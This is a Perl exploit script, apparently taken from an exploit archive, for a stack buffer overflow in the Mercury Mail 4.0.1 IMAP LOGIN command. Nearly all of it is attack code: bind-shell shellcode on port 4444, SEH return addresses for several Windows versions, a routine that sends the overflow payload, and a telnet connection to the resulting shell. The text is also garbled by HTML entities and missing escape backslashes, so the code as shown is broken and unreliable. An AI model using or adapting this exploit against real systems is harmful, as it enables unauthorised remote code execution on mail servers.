Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

#!/usr/bin/perl #&nbsp; #&nbsp;http://www.securityfocus.com/bid/11775 #&nbsp;credit&nbsp;to&nbsp;Muts&nbsp;for&nbsp;this&nbsp;vulnerability #&nbsp;acaro&nbsp;[at]&nbsp;jervus.it use&nbsp;IO::Socket::INET; use&nbsp;Switch; if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{ print&nbsp;\"-------------------------------------------------------------------- \"; print&nbsp;\"Usage&nbsp;:&nbsp;mercury-4444-multi.pl&nbsp;-hTargetIPAddress&nbsp;-oAssemblyinstructions \"; print&nbsp;\"&nbsp;Return&nbsp;address:&nbsp; \"; print&nbsp;\"&nbsp;1&nbsp;-&nbsp;Windows&nbsp;2k&nbsp;Sp4&nbsp;English&nbsp;Version \"; print&nbsp;\"&nbsp;2&nbsp;-&nbsp;Windows&nbsp;2k&nbsp;Sp4&nbsp;Italian&nbsp;Version \"; print&nbsp;\"&nbsp;3&nbsp;-&nbsp;Windows&nbsp;XP&nbsp;Sp1&nbsp;English&nbsp;Version \"; print&nbsp;\"&nbsp;4&nbsp;-&nbsp;Windows&nbsp;XP&nbsp;Sp0&nbsp;English&nbsp;Version \"; print&nbsp;\"&nbsp;If&nbsp;values&nbsp;not&nbsp;specified,&nbsp;Windows&nbsp;2k&nbsp;Sp4&nbsp;will&nbsp;be&nbsp;used. \"; print&nbsp;\"&nbsp;Example&nbsp;:&nbsp;./mercury-4444-multi.pl&nbsp;-h127.0.0.1&nbsp;-o1&nbsp;-o1 \"; print&nbsp;\"-------------------------------------------------------------------- \"; } use&nbsp;IO::Socket::INET; my&nbsp;$host&nbsp;=&nbsp;10.0.0.2; my&nbsp;$port&nbsp;=&nbsp;143; my&nbsp;$reply; my&nbsp;$request; my&nbsp;$jmp=\"xe9x02xffxffxff\"; my&nbsp;$nextseh&nbsp;=&nbsp;\"x90x90xebx09\"; #A&nbsp;binary&nbsp;translation&nbsp;of&nbsp;NGS&nbsp;Writing&nbsp;Small&nbsp;Shellcode&nbsp;by&nbsp;Dafydd&nbsp;Stuttard&nbsp;with&nbsp;only&nbsp;two&nbsp;little&nbsp;differences #1)bind&nbsp;port,&nbsp;in&nbsp;this&nbsp;exploit&nbsp;is&nbsp;4444&nbsp;in&nbsp;the&nbsp;original&nbsp;shellcode&nbsp;was&nbsp;6666 #2)4&nbsp;bytes&nbsp;added&nbsp;to&nbsp;the&nbsp;shellcode&nbsp;in&nbsp;order&nbsp;not&nbsp;to&nbsp;see&nbsp;the&nbsp;window&nbsp;of&nbsp;cmd.exe&nbsp;on&nbsp;remote&nbsp;host my&nbsp;$shellcode&nbsp;=&nbsp; \"x59x81xc9xd3x62x30x20x41x43x4dx64\". \"x64x99x96x8Dx7ExE8x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1C\". \"x8Bx09x8Bx69x08xB6x03x2BxE2x66xBAx33x32x52x68x77\". \"x73x32x5Fx54xACx3CxD3x75x06x95xFFx57xF4x95x57x60\". \"x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFF\". \"x47x8Bx34xBBx03xF5x99xACx34x71x2AxD0x3Cx71x75xF7\". \"x3Ax54x24x1Cx75xEAx8Bx59x24x03xDDx66x8Bx3Cx7Bx8B\". \"x59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3BxF7x75xB4\". \"x5Ex54x6Ax02xADxFFxD0x88x46x13x8Dx48x30x8BxFCxF3\". \"xABx40x50x40x50xADxFFxD0x95xB8x02xFFx11x5cx32xE4\". \"x50x54x55xADxFFxD0x85xC0x74xF8xFEx44x24x2DxFEx44\". \"x24x2cx83xEFx6CxABxABxABx58x54x54x50x50x50x54x50\". \"x50x56x50xFFx56xE4xFFx56xE8\"; foreach&nbsp;(@ARGV)&nbsp;{ $host&nbsp;=&nbsp;$1&nbsp;if&nbsp;($_=~/-h((.*).(.*).(.*).(.*))/); $seh&nbsp;=&nbsp;$1&nbsp;if&nbsp;($_=~/-o(.*)/); $happy&nbsp;=&nbsp;$1&nbsp;if&nbsp;($_=~/-o(.*)/); } switch&nbsp;($seh)&nbsp;{ case&nbsp;1&nbsp;{&nbsp;$seh=\"x43x8fx2dx7c\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;English&nbsp;version&nbsp;jmp&nbsp;ebx&nbsp;in&nbsp;advapi32.dll case&nbsp;2&nbsp;{&nbsp;$seh=\"x43x8fx26x79\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;Italian&nbsp;version&nbsp;jmp&nbsp;ebx&nbsp;in&nbsp;advapi32.dll case&nbsp;3&nbsp;{&nbsp;$seh=\"xc0x5fx3cx76\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP1&nbsp;version&nbsp;pop&nbsp;ecx&nbsp;pop&nbsp;ecx&nbsp;ret&nbsp;in&nbsp;comdlg32.dll case&nbsp;4&nbsp;{&nbsp;$seh=\"xfcx61x3cx76\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP0&nbsp;version&nbsp;pop&nbsp;ecx&nbsp;pop&nbsp;ecx&nbsp;ret&nbsp;in&nbsp;comdlg32.dll } switch&nbsp;($happy)&nbsp;{ case&nbsp;1&nbsp;{&nbsp;$happy=\"x8dx83x34xffxffxffx50xc3\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;English&nbsp;version case&nbsp;2&nbsp;{&nbsp;$happy=\"x8dx83x34xffxffxffx50xc3\"&nbsp;}&nbsp;#&nbsp;Win2k&nbsp;SP4&nbsp;Italian&nbsp;version case&nbsp;3&nbsp;{&nbsp;$happy=\"x8bxc1x66x05x34x29x50xc3\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP1&nbsp;version case&nbsp;4&nbsp;{&nbsp;$happy=\"x8bxc1x66x05x34x29x50xc3\"&nbsp;}&nbsp;#&nbsp;WinXP&nbsp;Pro&nbsp;English&nbsp;SP0&nbsp;version } my&nbsp;$request&nbsp;=\"1&nbsp;LOGIN\".(\"&nbsp;\"x948).\"{255} \"; my&nbsp;$socket&nbsp;=&nbsp;IO::Socket::INET->new(proto=>\'tcp\',&nbsp;PeerAddr=>$host,&nbsp;PeerPort=>$port); $socket&nbsp;or&nbsp;die&nbsp;\"Cannot&nbsp;connect&nbsp;to&nbsp;host! \"; recv($socket,&nbsp;$reply,&nbsp;1024,&nbsp;0); print&nbsp;\"Response:\"&nbsp;.&nbsp;$reply; send&nbsp;$socket,&nbsp;$request,&nbsp;0; print&nbsp;\"[+]&nbsp;Sent&nbsp;1st&nbsp;request \"; recv($socket,&nbsp;$reply,&nbsp;1024,&nbsp;0); print&nbsp;\"Response:\"&nbsp;.&nbsp;$reply; sleep(1); my&nbsp;$request&nbsp;=\"x41\"&nbsp;x&nbsp;255; send&nbsp;$socket,&nbsp;$request,&nbsp;0; print&nbsp;\"[+]&nbsp;Sent&nbsp;2nd&nbsp;request \"; sleep(1); my&nbsp;$request=(\"x45\"&nbsp;x7420).(\"x90\"&nbsp;x10).$happy.(\"x90\"&nbsp;x14).$shellcode.(\"x41\"&nbsp;x8).$nextseh.$seh.(\"x90\"&nbsp;x5).$jmp.(\"x90\"&nbsp;x533); send&nbsp;$socket,&nbsp;$request,&nbsp;0; print&nbsp;\"[+]&nbsp;Sent&nbsp;final&nbsp;request \"; sleep(1); close($socket); print&nbsp;\"&nbsp;+&nbsp;connect&nbsp;on&nbsp;port&nbsp;4444&nbsp;of&nbsp;$host&nbsp;... \"; sleep(3); system(\"telnet&nbsp;$host&nbsp;4444\"); exit; &nbsp;